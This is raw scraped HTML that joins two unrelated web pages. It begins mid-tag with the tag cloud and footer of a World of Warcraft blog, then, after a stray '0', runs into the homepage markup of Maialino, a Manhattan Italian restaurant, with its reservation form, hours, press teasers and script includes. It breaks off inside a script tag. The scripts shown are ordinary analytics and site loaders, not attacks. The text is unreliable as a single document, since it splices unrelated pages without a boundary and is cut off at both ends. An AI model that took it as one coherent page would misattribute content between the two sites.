14.411214953271pt;" aria-label="Paladin (55 items)">Paladin</a> <a href="http://www.worldofmatticus.com/tag/podcast/" class="tag-cloud-link tag-link-265 tag-link-position-24" style="font-size: 8pt;" aria-label="podcast (17 items)">podcast</a> <a href="http://www.worldofmatticus.com/tag/priest-discussion/" class="tag-cloud-link tag-link-214 tag-link-position-25" style="font-size: 18.990654205607pt;" aria-label="Priest Discussion (124 items)">Priest Discussion</a> <a href="http://www.worldofmatticus.com/tag/priest/" class="tag-cloud-link tag-link-2433 tag-link-position-26" style="font-size: 12.18691588785pt;" aria-label="Priest Discussion (37 items)">Priest Discussion</a> <a href="http://www.worldofmatticus.com/tag/pve/" class="tag-cloud-link tag-link-233 tag-link-position-27" style="font-size: 9.0467289719626pt;" aria-label="PvE (21 items)">PvE</a> <a href="http://www.worldofmatticus.com/tag/pve-healing/" class="tag-cloud-link tag-link-2434 tag-link-position-28" style="font-size: 14.411214953271pt;" aria-label="PvE Healing (55 items)">PvE Healing</a> <a href="http://www.worldofmatticus.com/tag/raid/" class="tag-cloud-link tag-link-114 tag-link-position-29" style="font-size: 22pt;" aria-label="raid (211 items)">raid</a> <a href="http://www.worldofmatticus.com/tag/raiding/" class="tag-cloud-link tag-link-699 tag-link-position-30" style="font-size: 19.514018691589pt;" aria-label="raiding (136 items)">raiding</a> <a href="http://www.worldofmatticus.com/tag/recruiting/" class="tag-cloud-link tag-link-144 tag-link-position-31" style="font-size: 9.8317757009346pt;" aria-label="recruiting (24 items)">recruiting</a> <a href="http://www.worldofmatticus.com/tag/resto/" class="tag-cloud-link tag-link-179 tag-link-position-32" style="font-size: 10.878504672897pt;" aria-label="resto (29 items)">resto</a> <a href="http://www.worldofmatticus.com/tag/restoration-shaman/" class="tag-cloud-link tag-link-1256 tag-link-position-33" style="font-size: 8.2616822429907pt;" aria-label="Restoration shaman (18 items)">Restoration shaman</a> <a href="http://www.worldofmatticus.com/tag/shaman-subjects/" class="tag-cloud-link tag-link-392 tag-link-position-34" style="font-size: 15.327102803738pt;" aria-label="Shaman Subjects (65 items)">Shaman Subjects</a> <a href="http://www.worldofmatticus.com/tag/spec/" class="tag-cloud-link tag-link-543 tag-link-position-35" style="font-size: 8.5233644859813pt;" aria-label="spec (19 items)">spec</a> <a href="http://www.worldofmatticus.com/tag/strategy/" class="tag-cloud-link tag-link-299 tag-link-position-36" style="font-size: 9.3084112149533pt;" aria-label="strategy (22 items)">strategy</a> <a href="http://www.worldofmatticus.com/tag/sydera/" class="tag-cloud-link tag-link-682 tag-link-position-37" style="font-size: 16.242990654206pt;" aria-label="sydera (76 items)">sydera</a> <a href="http://www.worldofmatticus.com/tag/sytycb/" class="tag-cloud-link tag-link-650 tag-link-position-38" style="font-size: 9.9626168224299pt;" aria-label="SYTYCB (25 items)">SYTYCB</a> <a href="http://www.worldofmatticus.com/tag/talent/" class="tag-cloud-link tag-link-544 tag-link-position-39" style="font-size: 9.5700934579439pt;" aria-label="talent (23 items)">talent</a> <a href="http://www.worldofmatticus.com/tag/tank/" class="tag-cloud-link tag-link-312 tag-link-position-40" style="font-size: 8pt;" aria-label="tank (17 items)">tank</a> <a href="http://www.worldofmatticus.com/tag/ulduar/" class="tag-cloud-link tag-link-845 tag-link-position-41" style="font-size: 13.233644859813pt;" aria-label="ulduar (45 items)">ulduar</a> <a href="http://www.worldofmatticus.com/tag/world-of-warcraft/" class="tag-cloud-link tag-link-2431 tag-link-position-42" style="font-size: 9.8317757009346pt;" aria-label="War-Crafting (24 items)">War-Crafting</a> <a href="http://www.worldofmatticus.com/tag/wow/" class="tag-cloud-link tag-link-53 tag-link-position-43" style="font-size: 9.5700934579439pt;" aria-label="WoW (23 items)">WoW</a> <a href="http://www.worldofmatticus.com/tag/wrath/" class="tag-cloud-link tag-link-631 tag-link-position-44" style="font-size: 10.224299065421pt;" aria-label="wrath (26 items)">wrath</a> <a href="http://www.worldofmatticus.com/tag/wynthea/" class="tag-cloud-link tag-link-551 tag-link-position-45" style="font-size: 13.102803738318pt;" aria-label="wynthea (44 items)">wynthea</a></div> </div></div> </div></div></div><div id="footer" class="footer"><div class="wrap"><div class="gototop"><p><a href="#wrap" rel="nofollow">Return to top of page</a></p></div><div class="creds"><p>Copyright &#x000A9;&nbsp;2019 &#x000B7; <a href="http://www.studiopress.com/themes/streamline">Streamline Child Theme</a> on <a href="https://www.studiopress.com/">Genesis Framework</a> &#x000B7; <a href="https://wordpress.org/">WordPress</a> &#x000B7; <a rel="nofollow" href="http://www.worldofmatticus.com/wp-login.php">Log in</a></p></div></div></div></div><!-- Begin comScore Tag --> <script> document.write(unescape("% 3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E")); </script> <script> COMSCORE.beacon({ c1:2, c2:6885237, c3:"", c4:"", c5:"", c6:"", c15:"" }); </script> <noscript> <img src="http://b.scorecardresearch.com/p?c1=2&c2=6885237&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript> <!-- End comScore Tag --><style type="text/css" media="screen"> #simple-social-icons-2 ul li a, #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #d8d4d0 !important; border-radius: 3px; color: #ffffff !important; border: 0px #ffffff solid !important; font-size: 16px; padding: 8px; } #simple-social-icons-2 ul li a:hover, #simple-social-icons-2 ul li a:focus { background-color: #e96a2a !important; border-color: #ffffff !important; color: #ffffff !important; } #simple-social-icons-2 ul li a:focus { outline: 1px dotted #e96a2a !important; }</style><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=5.2'></script> <script type='text/javascript' src='http://apis.google.com/js/plusone.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"http:\/\/www.worldofmatticus.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.75.2'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/themes/genesis/lib/js/menu/superfish.min.js?ver=1.7.10'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/themes/genesis/lib/js/menu/superfish.args.min.js?ver=2.9.1'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/themes/genesis/lib/js/menu/superfish.compat.min.js?ver=2.9.1'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body></html>
0
<!DOCTYPE html> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"> <title>Home | Maialino Fine Dining</title> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <meta name="generator" content="Webflow"> <link rel="shortcut icon" type="image/x-icon" href="https://maialinonyc.com/wp-content/themes/maialino/images/favicon.png" /> <link rel="alternate" type="application/rss+xml" title="Maialino Fine Dining &raquo; Feed" href="https://maialinonyc.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Maialino Fine Dining &raquo; Comments Feed" href="https://maialinonyc.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Maialino Fine Dining &raquo; Home Comments Feed" href="https://maialinonyc.com/sample-page/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"https:\/\/maialinonyc.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.11"}}; !function(a,b,c){function d(a){var c=b.createElement("canvas"),d=c.getContext&&c.getContext("2d");return d&&d.fillText?(d.textBaseline="top",d.font="600 32px Arial","flag"===a?(d.fillText(String.fromCharCode(55356,56812,55356,56807),0,0),c.toDataURL().length>3e3):(d.fillText(String.fromCharCode(55357,56835),0,0),0!==d.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='contact-form-7-css' href='https://maialinonyc.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='main-style-css' href='https://maialinonyc.com/wp-content/themes/maialino/style.css?ver=1.2' type='text/css' media='all' /> <link rel='stylesheet' id='normalize-style-css' href='https://maialinonyc.com/wp-content/themes/maialino/css/normalize.css?ver=1.2' type='text/css' media='all' /> <link rel='stylesheet' id='webflow-style-css' href='https://maialinonyc.com/wp-content/themes/maialino/css/webflow.css?ver=1.2' type='text/css' media='all' /> <link rel='stylesheet' id='madmenu-style-css' href='https://maialinonyc.com/wp-content/plugins/restaurantmenu/css/madmenu.css?ver=2.0' type='text/css' media='all' /> <link rel='stylesheet' id='maialino-style-css' href='https://maialinonyc.com/wp-content/themes/maialino/css/maialino.css?ver=1.2' type='text/css' media='all' /> <script type='text/javascript' src='https://maialinonyc.com/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script><script>jQueryWP = jQuery;</script> <script type='text/javascript' src='https://maialinonyc.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://maialinonyc.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://maialinonyc.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.3.11" /> <link rel='canonical' href='https://maialinonyc.com/' /> <link rel='shortlink' href='https://maialinonyc.com/' /> <script type="text/javascript">var ajaxurl = "https://maialinonyc.com/wp-admin/admin-ajax.php"</script> <script type="text/javascript" src="//use.typekit.net/bvi1oyh.js"></script> <script type="text/javascript">try{Typekit.load();}catch(e){}</script> <script type="text/javascript"> setTimeout(function(){var a=document.createElement("script"); var b=document.getElementsByTagName("script")[0]; a.src=document.location.protocol+"//dnn506yrbagrg.cloudfront.net/pages/scripts/0027/7987.js?"+Math.floor(new Date().getTime()/3600000); a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1); </script> </head> <body class="home page page-id-2 page-parent page-template page-template-page-home page-template-page-home-php"> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <div class="modal mailinglist" id="newsletter"> <a class="button close-modal" href="javascript:void(0)">X</a> <h2 class="modalhead">Join Our Mailing List</h2> <p>Enter your email address to receive updates from us about new offerings, events, and restaurant happenings.</p> <div class="w-form"> <form target="_new" method="post" id="e2ma_signup" action="https://app.e2ma.net/app2/audience/signup/1763344/40465/?v=a"> <input type="hidden" name="prev_member_email" id="id_prev_member_email"> <input type="hidden" name="source" id="id_source"> <input type="hidden" name="group_508433" value="508433" id="id_group_508433"> <input type="hidden" name="private_set" value="{num_private}"> <div class="e2ma_signup_form_element"><input type="text" name="email" placeholder="Enter your email address" id="id_email"></div> <input id="e2ma_signup_submit_button" class="e2ma_signup_form_button" type="submit" name="Submit" value="· &nbsp;&nbsp;SUBMIT&nbsp;&nbsp; ·" {disabled}=""> </form> </div> </div> <div class="modal gift-cards" id="gift-cards"> <a class="button close-modal" href="javascript:void(0)">X</a> <h2 class="modalhead">Gift Cards</h2> <img src="/wp-content/themes/maialino/images/gc.png" alt="533f0e3e3f114f4c440001a5_gc.png"> <a class="gift-card-link" href="https://ecommerce.custcon.com/Selection.aspx?c=D936B6A5-6CB9-42C7-8762-9BBEECC3C29D" target="_blank">Purchase a Gift Card</a> <a class="gift-card-link" href="https://members.custcon.com/myquery/vowinit?mauid=F9067D93-80A9-43F0-94D5-D2286606B9EF" target="_blank">Check Gift Card balance</a> </div> <div class="modal" id="join-team"> <a class="button close-modal" href="javascript:void(0)">X</a> <h2 class="modalhead">Join Our Team</h2> <p>At Maialino, we strive to bring together caring, warm and intelligent people who love to serve and are among the best in their field.</p> <p>To inquire about joining our team, please <strong><a href="http://www.ushgnyc.com/people/join-our-team/"target="_blank">click here!</a></strong></p> </div> <nav id="main-nav"> <a class="logo-link" href="/"> <img class="logo" src="/wp-content/themes/maialino/images/logo--red-retina.png" width="172" alt="Maialino Logo"> <img class="logo-small" src="/wp-content/themes/maialino/images/MaialinoMonoWhite-03.png" width="227" alt="Maialino Logo Small"> </a> <div class="nav-wrap"> <div class="w-nav-button w-icon-nav-menu"></div> <a class="navlink toggle-link mobile-hours-link" name="hours-reservations" href="javascript:void(0)" id="visit-btn3">Hours &amp; Reservations</a> <ul class="nav-menu" role="navigation"> <li class="has-subnav"> <a class="navlink" href="/menu" id="navmenu">Menus</a> <div class="mobile-subnav-wrap"> <ul class="subnav"> <li><a class="subnav-link" name="#breakfast" href="/menu/#breakfast">Breakfast</a></li> <li><a class="subnav-link" name="#lunch" href="/menu/#lunch">Lunch</a></li> <li><a class="subnav-link" name="#dinner" href="/menu/#dinner">Dinner</a></li> <li><a class="subnav-link" name="#dolci" href="/menu/#dolci">Dessert</a></li> <li><a class="subnav-link" name="#brunch" href="/menu/#brunch">Weekend Brunch</a></li> <li><a class="subnav-link" name="#bar" href="/menu/#bar">Bar Maialino</a></li> <li><a class="subnav-link" name="#beverages" href="/menu/#beverages">Beverages</a></li> </ul> </div> </li> <li><a class="navlink" href="/about">Our Story</a></li> <li><a class="navlink" href="/private-dining">Private Dining</a></li> <li><a class="navlink" href="/news-and-events">News &amp; Events</a></li> <li><a class="navlink" href="http://www.maialinosweetstogo.com/" target="_blank">Sweets to Go</a></li> <li><a class="navlink" href="https://www.trycaviar.com/t/manhattan/maialino-5113?groups=f_online__d_clink2__p_marketing__c_merchant-links&utm_medium=localmarketing&utm_source=widget&utm_campaign=maialino-5113&utm_term=manhattan&utm_content=maialino-5113&cvosrc=localmarketing.widget.maialino-5113&cvo_campaign=maialino-5113&cav_medium=widget&cav_source=maialino-5113" target="_blank">Delivery</a></li> <li><a class="navlink toggle-link w-hidden-small" name="hours-reservations" href="javascript:void(0)">Hours &amp; Reservations</a></li> </ul> </div> </nav> <div class="hours-dropdown" id="hours-reservations"> <a class="button visitclose toggle-link" href="javascript:void(0)" id="visitclose" name="hours-reservations">X</a> <div class="map"> <!-- <div class="overlay" onClick="style.pointerEvents='none'"></div> --> </div> <div class="w-container"> <p class="location">2 Lexington Avenue <em>(at 21st Street)</em>, located at the Gramercy Park Hotel &nbsp;| &nbsp;212.777.2410 &nbsp;| &nbsp;<a class="toggle-link" name="directions">DIRECTIONS &amp; PARKING</a></p> <div class="w-row dropdown" id="directions"> <div class="w-col w-col-6"> <h5 class="directions">Subway lines</h5> <p>23rd Street: 6 <br>Union Square: 4, 5, 6, N, Q, R <br>3rd Ave: L</p> </div> <div class="w-col w-col-6"> <h5 class="directions">Parking</h5> <p>Icon Unique: 21st&nbsp;between Park &amp; Broadway <br>Central: 21st&nbsp;between 1st&nbsp;&amp; 2nd <br>Metered parking around Gramercy Park <br>GPH Valet $65 cars/$75 SUVs flat rate up to 24hrs</p> </div> </div> </div> <div class="w-container vitalblock"> <div class="w-row"> <div class="w-col w-col-6 rescolumn"> <h2 class="white">Reservations</h2> <p class="vitalnote">Reservations are accepted in our dining room up to 28 days in advance for parties of up to 8 guests. Parties of 4 guests and fewer can reserve either online or over the phone; we accept reservations for 5 – 8 guests only over the phone. The front bar area is walk-in only and is open continuously each day until midnight.</p> <h5>Book Online</h5> <div class="w-form"> <form class="resform" name="ism" id="ism" method="POST" action="/makereservation.php" target="_blank"> <label class="reslabel" for="partysize">Party Size</label> <select class="w-select resdropdown" name="partySize" data-name="partySize"> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option> <option value="5">5</option> <option value="6">6</option> <option value="7">7</option> <option value="8">8</option> </select> <label class="reslabel" for="date">Date</label> <select class="w-select resdropdown" name="resDate" data-name="resDate"> <option value="05/16/2019">05/16/2019</option><option value="05/17/2019">05/17/2019</option><option value="05/18/2019">05/18/2019</option><option value="05/19/2019">05/19/2019</option><option value="05/20/2019">05/20/2019</option><option value="05/21/2019">05/21/2019</option><option value="05/22/2019">05/22/2019</option><option value="05/23/2019">05/23/2019</option><option value="05/24/2019">05/24/2019</option><option value="05/25/2019">05/25/2019</option><option value="05/26/2019">05/26/2019</option><option value="05/27/2019">05/27/2019</option><option value="05/28/2019">05/28/2019</option><option value="05/29/2019">05/29/2019</option><option value="05/30/2019">05/30/2019</option><option value="05/31/2019">05/31/2019</option><option value="06/01/2019">06/01/2019</option><option value="06/02/2019">06/02/2019</option><option value="06/03/2019">06/03/2019</option><option value="06/04/2019">06/04/2019</option><option value="06/05/2019">06/05/2019</option><option value="06/06/2019">06/06/2019</option><option value="06/07/2019">06/07/2019</option><option value="06/08/2019">06/08/2019</option><option value="06/09/2019">06/09/2019</option><option value="06/10/2019">06/10/2019</option><option value="06/11/2019">06/11/2019</option><option value="06/12/2019">06/12/2019</option><option value="06/13/2019">06/13/2019</option> </select> <label class="reslabel" for="resTime">Time</label> <select class="w-select resdropdown" name="resTime" data-name="resTime"> <option value="7:30 AM">7:30 a.m.</option> <option value="8:00 AM">8:00 a.m.</option> <option value="8:30 AM">8:30 a.m.</option> <option value="9:00 AM">9:00 a.m.</option> <option value="9:30 AM">9:30 a.m.</option> <option value="10:00 AM">10:00 a.m.</option> <option value="10:30 AM">10:30 a.m.</option> <option value="11:00 AM">11:00 a.m.</option> <option value="11:30 AM">11:30 a.m.</option> <option value="12:00 PM">12:00 p.m.</option> <option value="12:30 PM">12:30 p.m.</option> <option value="1:00 PM">1:00 p.m.</option> <option value="1:30 PM">1:30 p.m.</option> <option value="2:00 PM">2:00 p.m.</option> <option value="2:30 PM">2:30 p.m.</option> <option value="3:00 PM">3:00 p.m.</option> <option value="3:30 PM">3:30 p.m.</option> <option value="4:00 PM">4:00 p.m.</option> <option value="4:30 PM">4:30 p.m.</option> <option value="5:00 PM">5:00 p.m.</option> <option value="5:30 PM">5:30 p.m.</option> <option value="6:00 PM">6:00 p.m.</option> <option value="6:30 PM">6:30 p.m.</option> <option value="7:00 PM">7:00 p.m.</option> <option value="7:30 PM">7:30 p.m.</option> <option value="8:00 PM">8:00 p.m.</option> <option value="8:30 PM">8:30 p.m.</option> <option value="9:00 PM">9:00 p.m.</option> <option value="9:30 PM">9:30 p.m.</option> </select> <input class="w-button submit" type="submit" value="· &nbsp;&nbsp;Submit&nbsp;&nbsp; ·" data-wait="Please wait..."> </form> </div> </div> <div class="w-col w-col-6 w-clearfix hourscolumn"> <h2 class="white">Hours</h2> <div class="hourblock"> <h5><a class="hours-menu-link" href="/menu/#breakfast">Breakfast</a></h5> <img class="hourarrow" src="/wp-content/themes/maialino/images/white_arrow.png" alt="532ceecc9917b8f163000060_white_arrow.png"> <p class="hours-p">MONDAY - FRIDAY | 7:30 a.m. - 10:00 a.m.&nbsp;</p> </div> <div class="hourblock"> <h5><a class="hours-menu-link" href="/menu/#lunch">Lunch</a></h5> <img class="hourarrow" src="/wp-content/themes/maialino/images/white_arrow.png" alt="532ceecc9917b8f163000060_white_arrow.png"> <p class="hours-p">MONDAY - FRIDAY | 12:00 p.m. - 2:00 p.m.&nbsp;</p> </div> <div class="hourblock"> <h5><a class="hours-menu-link" href="/menu/#dinner">Dinner</a></h5> <img class="hourarrow" src="/wp-content/themes/maialino/images/white_arrow.png" alt="532ceecc9917b8f163000060_white_arrow.png"> <p class="hours-p">SUNDAY - WEDNESDAY | 5:30 p.m. - 10:00 p.m.&nbsp; <br>THURSDAY - SATURDAY | 5:30 p.m. - 10:30 p.m.</p> </div> <div class="hourblock"> <h5><a class="hours-menu-link" href="/menu/#brunch">Weekend Brunch</a></h5> <img class="hourarrow" src="/wp-content/themes/maialino/images/white_arrow.png" alt="532ceecc9917b8f163000060_white_arrow.png"> <p class="hours-p">SATURDAY - SUNDAY | 10:00 a.m. - 2:30 p.m.&nbsp;</p> </div> <div class="hourblock"> <h5><a class="hours-menu-link" href="/menu/#bar">Bar Maialino</a></h5> <img class="hourarrow" src="/wp-content/themes/maialino/images/white_arrow.png" alt="532ceecc9917b8f163000060_white_arrow.png"> <p class="hournote">Bar Maialino is open daily until 11 p.m., and 11:30 p.m. on weekends, serving food &amp; drink continuously. No reservations- just walk in.</p> </div> <h6 class="bottom-dropdown-close" ><a class="toggle-link" href="javascript:void(0)" name="hours-reservations">Close this dropdown</a></h6> </div> </div> <span class="credit-wrap"> <a class="credit-link" href="http://madwell.com" target="_blank">Site by Madwell</a> </span> </div> </div> <div class="ginghamstrip"></div> <div class="tablet-fixed-pig" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/A-full-table-with-wine-and-pasta-at-Maialino-Italian-restaurant-in-the-Gramercy-Park-Hotel.jpg');"></div> <div class="introtype-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/A-full-table-with-wine-and-pasta-at-Maialino-Italian-restaurant-in-the-Gramercy-Park-Hotel.jpg');"> <div class="w-container"> <div class="specials"> <a class="speciallink" href="https://www.goldbelly.com/maialino">Get Maialino baked goods delivered nationwide →</a> </div> </div> <div class="w-container introtype"> <div class="w-row top-row"> <div class="w-col w-col-4 breakfast-lunch-dinner-column"> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/pancakes1.jpg');"> <a href="/menu/#breakfast" class="homepage-menu-link breakfast"></a> </div> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/lunch_image.jpg');"> <a href="/menu/#lunch" class="homepage-menu-link lunch"></a> </div> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/dinner_image.jpg');"> <a href="/menu/#dinner" class="homepage-menu-link dinner"></a> </div> </div> <div class="w-col w-col-4 brunch-coffee-column"> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/brunch_image.jpg');"> <a href="/menu/#brunch" class="homepage-menu-link brunch"></a> </div> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/coffee_image.jpg');"> <a href="/menu/#beverages" class="homepage-menu-link coffee"></a> </div> </div> <div class="w-col w-col-4 specials-wines-column"> <div class="homepage-link-wrap latenight-wrap"> <a href="/menu/#bar" class="homepage-menu-link latenight"></a> </div> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/bar_image.jpg');"> <a href="/menu/#beverages" class="homepage-menu-link winebtg"></a> </div> </div> </div> <div class="w-row bottom-row"> <div class="w-col w-col-6 happy-hour-column"> <div class="homepage-link-wrap happyhour-wrap"> <a href="/menu/#bar" class="homepage-menu-link happyhour"></a> </div> </div> <div class="w-col w-col-6 private-dining-column"> <div class="homepage-link-wrap" style="background-image: url('https://maialinonyc.com/wp-content/uploads/2014/04/pdr_image.jpg');"> <a href="/private-dining" class="homepage-menu-link pdr"></a> </div> </div> </div> </div> </div> <div class="homenews"> <div class="ginghamstrip"></div> <div class="w-container behind-the-scenes"> <img class="behind-the-scenes-header-image" src="/wp-content/themes/maialino/images/bts.png" alt="Behind The Scenes"> <img class="center" src="/wp-content/themes/maialino/images/ofmaialino.png" alt="of Maialino"> <div class="w-embed w-video" id="homepage-video" style="padding-top: 56.20608899297424%;"> <iframe width="100%" height="100%" src="//www.youtube.com/embed/H8QrAKmaMdY" frameborder="0" allowfullscreen></iframe> </div> </div> <div class="w-container"> <a href="/news-and-events" class="home-news-header"></a> </div> <div class="w-container home-posts"> <div class="subhead center">Stay up to date on all the latest at Maialino</div> <div class="w-row mainpost"> <div class="w-col w-col-12 w-clearfix home-post"> <a class="category-link" href="/category/press">PRESS</a> <a href="https://maialinonyc.com/eater-maialino-is-one-of-new-yorks-pasta-destinations/"><img src="https://maialinonyc.com/wp-content/uploads/2017/08/20347077_826064644233803_6520288249758351360_n-474x302.jpg" class="homepage-thumbnail" /></a> <h3 class="post-title"><a class="post-link" href="https://maialinonyc.com/eater-maialino-is-one-of-new-yorks-pasta-destinations/">Eater: Maialino is One of New York&#8217;s Pasta Destinations</a></h3> <p>Eater named Maialino as one of New York&#8217;s top 18 pasta destinations. See the full list.</p> </div> </div> <div class="w-row secondaryposts"> <div class="w-col w-col-6 w-clearfix home-post home-post-left"> <a class="category-link" href="/category/news">NEWS</a> <a href="https://maialinonyc.com/the-infatuation-maialino-is-one-of-the-best-restaurants-for-private-dining-in-nyc/"><img src="https://maialinonyc.com/wp-content/uploads/2017/02/Maialino-Empty-PDR-5_Liz-Clayman-copy-474x302.jpg" class="homepage-thumbnail" /></a> <h3 class="post-title secondary"><a class="post-link" href="https://maialinonyc.com/the-infatuation-maialino-is-one-of-the-best-restaurants-for-private-dining-in-nyc/">The Infatuation: Maialino is One of the Best Restaurants for Private Dining in NYC</a></h3> <p>“Ever go to Maialino and wish you could order every single pasta on the menu? That dream can become a reality in Maialino’s private room, which seats up to 24 and overlooks Gramercy Park. Your group can order from a variety of exclusive family style menus to ensure that no one is forced to choose<a class="more-arrow" href="https://maialinonyc.com/the-infatuation-maialino-is-one-of-the-best-restaurants-for-private-dining-in-nyc/"></a></p> </div> <div class="w-col w-col-6 w-clearfix home-post home-post-right"> <a class="category-link" href="/category/events">EVENTS</a> <a href="https://maialinonyc.com/baked-goods-from-maialino/"><img src="https://maialinonyc.com/wp-content/uploads/2018/11/fc283dac-09f1-4a7f-a561-aa1091d6d078-474x302.jpg" class="homepage-thumbnail" /></a> <h3 class="post-title secondary"><a class="post-link" href="https://maialinonyc.com/baked-goods-from-maialino/">Baked Goods from Maialino</a></h3> <p>Executive Pastry Chef Jess Weiss&#8217;s beautiful, rustic desserts capture the comfort and warmth of Rome, reimagined for contemporary New York.  We now offer favorites from our pastry kitchen, available for delivery nationwide through Goldbelly. You can also order our handmade pies and baked goods for pick up from our online store. Our cakes, pies, cookies and more are<a class="more-arrow" href="https://maialinonyc.com/baked-goods-from-maialino/"></a></p> </div> </div> </div> </div> <a class="footer-image toggle-link" name="hours-reservations" href="javascript:void(0)" alt="Make A Reservation"></a> <div class="modal-background"></div> <footer class="footer"> <ul class="w-clearfix footerleft"> <li><a class="navlink footerlink modal-link" data-modal="newsletter" href="http://eepurl.com/cbPPc9" target="_blank">Mailing list</a></li> <li><a class="navlink footerlink modal-link" href="http://www.hirebridge.com/v3/jobs/list.aspx?cid=6687&m=0&bid=10" target="_blank">Join our team</a></li> <li><a class="navlink footerlink modal-link" data-modal="gift-cards" href="javascript:void(0)" id="gc-btn">Gift cards</a></li> <li><a class="navlink footerlink" href="/contact">contact</a></li> </ul> <div class="footerright"> <div class="footerinfo"> <span class="footer-address">2 Lexington Avenue, New York, NY 10010</span> <span class="footer-dividers">&nbsp; | &nbsp;</span> <a class="footer-phone" href="tel:1(212)777-2410">212.777.2410</a> <span class="footer-dividers"> &nbsp;| &nbsp;</span> <a class="navlink footerlink" href="mailto:[email protected]" target="_blank">[email protected]</a> <span class="footer-dividers"> &nbsp;| &nbsp;</span> </div> <ul class="w-clearfix footerconnect"> <li><a class="w-inline-block socialicon instagram" href="http://instagram.com/maialino_nyc" target="_blank"></a></li> <li><a class="w-inline-block socialicon twitter" href="https://twitter.com/maialino_nyc" target="_blank"></a></li> <li><a class="w-inline-block socialicon facebook" href="https://www.facebook.com/maialinoNYC" target="_blank"></a></li> </ul> </div> </footer> <!-- ================================ START FOOTER SCRIPTS ================================ --> <script type='text/javascript' src='https://maialinonyc.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"https:\/\/maialinonyc.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","recaptchaEmpty":"Please verify that you are not a robot.","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='https://maialinonyc.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.3.1'></script> <script type='text/javascript' src='https://maialinonyc.com/wp-content/themes/maialino/js/jquery.mobile.custom.min.js?ver=1.2'></script> <script type='text/javascript' src='https://maialinonyc.com/wp-includes/js/masonry.min.js?ver=3.1.2'></script> <script type='text/javascript' src='https://maialinonyc.com/wp-content/themes/maialino/js/interaction.js?ver=1.2'></script> <script type='text/javascript' src='https://maialinonyc.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://maialinonyc.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' 